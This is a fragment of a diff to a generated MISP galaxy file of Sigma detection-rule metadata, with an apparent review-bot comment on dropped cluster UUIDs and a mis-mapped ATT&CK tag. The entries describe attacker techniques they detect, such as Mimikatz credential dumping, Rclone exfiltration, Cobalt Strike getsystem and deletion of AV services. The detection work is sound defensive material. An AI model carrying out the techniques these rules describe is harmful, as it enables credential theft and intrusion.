Often used by attacker to remove AV software services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_malware_dtrack.yml", + "filename": "proc_creation_win_reg_delete_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "value": "Delete Services Via Reg Utility" + }, + { + "description": "Detects CrackMapExecWin Activity as Described by NCSC", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_dragonfly.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/my-name-is-dtrack/93338/", - "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", - "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", + "https://attack.mitre.org/software/S0488/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" + ], + "tags": [ + "attack.g0035", + "attack.credential_access", + "attack.discovery", + "attack.t1110", + "attack.t1087" + ] + }, + "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", + "value": "CrackMapExecWin" + }, + { + "description": "Detects a 
\"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_dllhost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://redcanary.com/blog/child-processes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "value": "Dllhost Process With No CommandLine" + }, + { + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/12/11", + "falsepositive": [ + "Legitimate usage of Setres" + ], + "filename": "proc_creation_win_lolbin_setres.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://lolbas-project.github.io/lolbas/Binaries/Setres/", + "https://twitter.com/0gtweet/status/1583356502340870144", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": 
"835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", + "value": "Use of Setres.exe" + }, + { + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "meta": { + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/10", + "falsepositive": [ + "Legitimate RClone use" + ], + "filename": "proc_creation_win_susp_rclone_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "value": "Rclone Execution via Command Line or PowerShell" + }, + { + "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + 
"https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, - "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "value": "DTRACK Process Creation" + "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "value": "Copy from Volume Shadow Copy" }, { - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", "meta": { - "author": "Florian Roth", - "creation_date": "2019/09/30", + "author": "Florian Roth, Markus Neis", + "creation_date": "2018/08/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_builtin_commands_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "2887e914-ce96-435f-8105-593937e90757", + "value": "Reconnaissance Activity Using BuiltIn Commands" + }, + { + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", "falsepositive": [ "Unlikely" ], - "filename": 
"proc_creation_win_malware_emotet.yml", + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", - "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", - "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", - "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "value": "Emotet Process Creation" - }, - { - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/09/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_malware_formbook.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", - "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", - "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", - "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "value": "Formbook Process Creation" - }, - { - "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", - "meta": { - "author": "Florian Roth, Tom Ueltschi", - "creation_date": "2019/01/16", - "falsepositive": [ - "Admin activity" - ], - "filename": "proc_creation_win_malware_notpetya.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/schroedingers-petya/78870/", - "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.t1070.001", - "attack.credential_access", - "attack.t1003.001", - "car.2016-04-002" + "attack.t1574.002" ] }, - "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", - "value": "NotPetya Ransomware Activity" - }, - { - "description": "Detects QBot like process executions", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_malware_qbot.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/killamjr/status/1179034907932315648", - "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ] - }, - "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "value": "QBot Process Creation" - }, - { - "description": "Detects Ryuk ransomware activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_malware_ryuk.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", - "value": "Ryuk Ransomware" + "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "value": "DLL Sideloading by VMware Xfer Utility" }, { "description": "Detects wscript/cscript executions of scripts located in user 
directories", 
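Review bot: The hunk silently drops cluster entries whose UUIDs are already published, e.g. `f1531fa4-5b84-4342-8f68-9cf3fdbd83d4` (DTRACK Process Creation), `d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18` (Emotet), `032f5fb3-d959-41a5-9263-4173c802dc2b` (Formbook), `79aeeb41-8156-4fac-a0cd-076495ab82a1` (NotPetya), `4fcac6eb-0287-4090-8eea-2602e4c20040` (QBot) and `c37510b8-2107-4b78-aa32-72f251e7a844` (Ryuk), and the neighbouring hunks do the same for LSASS Memory Dumping, the Conti rules, Trickbot, WannaCry and others. A galaxy cluster UUID is what MISP events and sightings tag against, so any instance that synced the previous version of this galaxy is left with dangling references, and the old/new offsets in the header (41840 vs 34255) suggest the removal is broad rather than isolated. If the generator keys on upstream rule paths, these are presumably rules that were moved to another directory upstream rather than retired; in that case they should be carried forward under their existing UUIDs (or kept with a deprecation marker) instead of deleted, and the commit description should state why entries disappear. Separately, the new `"value": "Copy from Volume Shadow Copy"` entry ends up with the inherited context tags `"attack.impact"`, `"attack.t1490"` although its description is about copying in-use registry hives, which is credential access (T1003.002 / T1003.003) rather than inhibiting recovery — since this file is generated, that mapping is best corrected upstream in `proc_creation_win_susp_cmd_shadowcopy_access.yml` and then regenerated.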
@@ -42025,671 +34515,127 @@ "value": "WScript or CScript Dropper" }, { - "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", "meta": { - "author": "David Burkett, Florian Roth", - "creation_date": "2019/12/28", - "falsepositive": [ - "Rare System Admin Activity" - ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", - "value": "Trickbot Malware Recon Activity" - }, - { - "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/11/26", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" 
- ], - "tags": [ - "attack.execution", - "attack.t1559" - ] - }, - "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "value": "Trickbot Malware Activity" - }, - { - "description": "Detects WannaCry ransomware activity", - "meta": { - "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_malware_wannacry.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" - ] - }, - "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", - "value": "WannaCry Ransomware" - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "meta": { - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2017/11/10", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_mal_adwind.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ] 
- }, - "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "value": "Adwind RAT / JRAT" - }, - { - "description": "Attempts to detect system changes made by Blue Mockingbird", - "meta": { - "author": "Trent Liffick (@tliffick)", - "creation_date": "2020/05/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mal_blue_mockingbird.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blue-mockingbird-cryptominer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" - ] - }, - "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "value": "Blue Mockingbird" - }, - { - "description": "Detects DarkSide Ransomware and helpers", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/14", - "falsepositive": [ - "Unknown", - "UAC bypass method used by other malware" - ], - "filename": "proc_creation_win_mal_darkside_ransomware.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", - "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", - "value": "DarkSide Ransomware Pattern" - }, - { - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "meta": { - "author": "Florian Roth", - "creation_date": 
"2022/02/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", - "value": "Hermetic Wiper TG Process Patterns" - }, - { - "description": "Detects LockerGoga Ransomware command line.", - "meta": { - "author": "Vasiliy Burov, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", - "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", - "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "74db3488-fd28-480a-95aa-b7af626de068", - "value": "LockerGoga Ransomware" - }, - { - "description": "Detects Ryuk Ransomware command lines", - "meta": { - "author": "Vasiliy Burov", - "creation_date": "2019/08/06", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_mal_ryuk.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "0acaad27-9f02-4136-a243-c357202edd74", - "value": "Ryuk Ransomware Command Line Activity" - }, - { - "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_manage_bde_lolbas.yml", + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", - "https://twitter.com/bohops/status/980659399495741441", - "https://twitter.com/JohnLaTwC/status/1223292479270600706", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" + "https://twitter.com/0gtweet/status/1560732860935729152", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "value": "Suspicious Usage of the Manage-bde.wsf Script" - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Commandlines containing components 
like cmd accidentally", - "Jobs and services started with cmd" - ], - "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ] - }, - "uuid": "15619216-e993-4721-b590-4c520615a67d", - "value": "Meterpreter or Cobalt Strike Getsystem Service Start" - }, - { - "description": "Detection well-known mimikatz command line arguments", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "filename": "proc_creation_win_mimikatz_command_line.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" - ] - }, - "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", - "value": "Mimikatz Command Line" - }, - { - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" 
as a child of svchost.exe", - "meta": { - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", - "creation_date": "2020/03/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_mmc20_lateral_movement.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" - ], - "tags": [ - "attack.execution", - "attack.t1021.003" - ] - }, - "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "value": "MMC20 Lateral Movement" - }, - { - "description": "Detects a Windows command line executable started from MMC", - "meta": { - "author": "Karneades, Swisscom CSIRT", - "creation_date": "2019/08/05", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_mmc_spawn_shell.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "value": "MMC Spawning Windows Shell" - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_modify_group_policy_settings.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": 
"windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ] - }, - "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", - "value": "Modify Group Policy Settings" - }, - { - "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ] - }, - "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", - "value": "Modification Of Existing Services For Persistence" - }, - { - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "meta": { - "author": "Sreeman", - "creation_date": "2020/10/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", - "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1197" - ] - }, - "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "value": "Monitoring For Persistence Via BITS" - }, - { - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/08/13", - "falsepositive": [ - "Legitimate uses of Mouse Lock software" - ], - "filename": "proc_creation_win_mouse_lock.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", - "https://sourceforge.net/projects/mouselock/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" - ], - "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" - ] - }, - "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - 
